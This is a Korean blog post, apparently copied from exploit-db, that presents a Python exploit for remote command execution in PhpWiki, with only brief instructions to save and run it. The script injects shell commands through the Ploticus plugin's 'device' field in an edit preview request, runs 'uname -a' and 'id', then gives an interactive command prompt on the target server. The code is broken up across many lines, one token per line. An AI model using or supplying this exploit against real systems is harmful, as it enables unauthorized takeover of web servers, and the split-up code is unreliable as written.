출처 : www.exploit-db.com
PhpWik의 원격 명령실행 파이선 스크립트 입니다
사용법은 아래 코드를 파이썬 확장자로 저장후 스크립트를 실행하면 됩니다
따로 자세한 설명이 필요없어서 코드만 게시를 합니다.
향후 자세한 설명이나 실행법이 필요한 코드가 있으면 따로 서술 하겠습니다
###############################################################
# ____ __ _ __ _
# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)
# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /
#/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/
# /_/ /_/ /_/
# Diskovered in Nov/Dec 2011
###############################################################
import
urllib
import
urllib2
import
sys
def
banner():
print
" ____ __ _ __ _ "
print
" / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)"
print
" / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
print
" / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / "
print
" /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "
print
" /_/ /_/ /_/ \n"
def
usage():
banner()
print
" [+] Usage example"
print
" [-] python "
+
sys.argv[
0
]
+
" http://path.to/wiki"
if
len
(sys.argv)<
2
:
usage()
quit()
domain
=
sys.argv[
1
]
def
commandexec(cmd):
data
=
urllib.urlencode([(
'pagename'
,
'HeIp'
),(
'edit[content]'
,
'<<Ploticus device=";echo 123\':::\' 1>&2;'
+
cmd
+
' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'
),(
'edit[preview]'
,
'Preview'
),(
'action'
,
'edit'
)])
cmd1
=
urllib2.Request(domain
+
'/index.php/HeIp'
,data)
cmd2
=
urllib2.urlopen(cmd1)
output
=
cmd2.read()
firstloc
=
output.find(
"123:::\n"
)
+
len
(
"123:::\n"
)
secondloc
=
output.find(
"\n:::123"
)
return
output[firstloc:secondloc]
banner()
print
commandexec(
'uname -a'
)
print
commandexec(
'id'
)
while
(quit !
=
1
):
cmd
=
raw_input
(
'Run a command: '
)
if
cmd
=
=
'quit'
:
print
"[-] Hope you had fun :)"
quit
=
1
if
cmd !
=
'quit'
:
print
commandexec(cmd)
'보안 > 웹' 카테고리의 다른 글
WordPress DDOS 공격 분석 (0) | 2014.09.30 |
---|---|
Bash Vulnerability CVE-2014-6271 Test Tool (0) | 2014.09.26 |
Bash Environment Variables Code Injection Exploit (CVE-2014-6271) (0) | 2014.09.26 |
Internet Explorer MS14-029 취약점 코드 (0) | 2014.09.21 |
Http File Server 2.3.x - Remote Command Execution (0) | 2014.09.16 |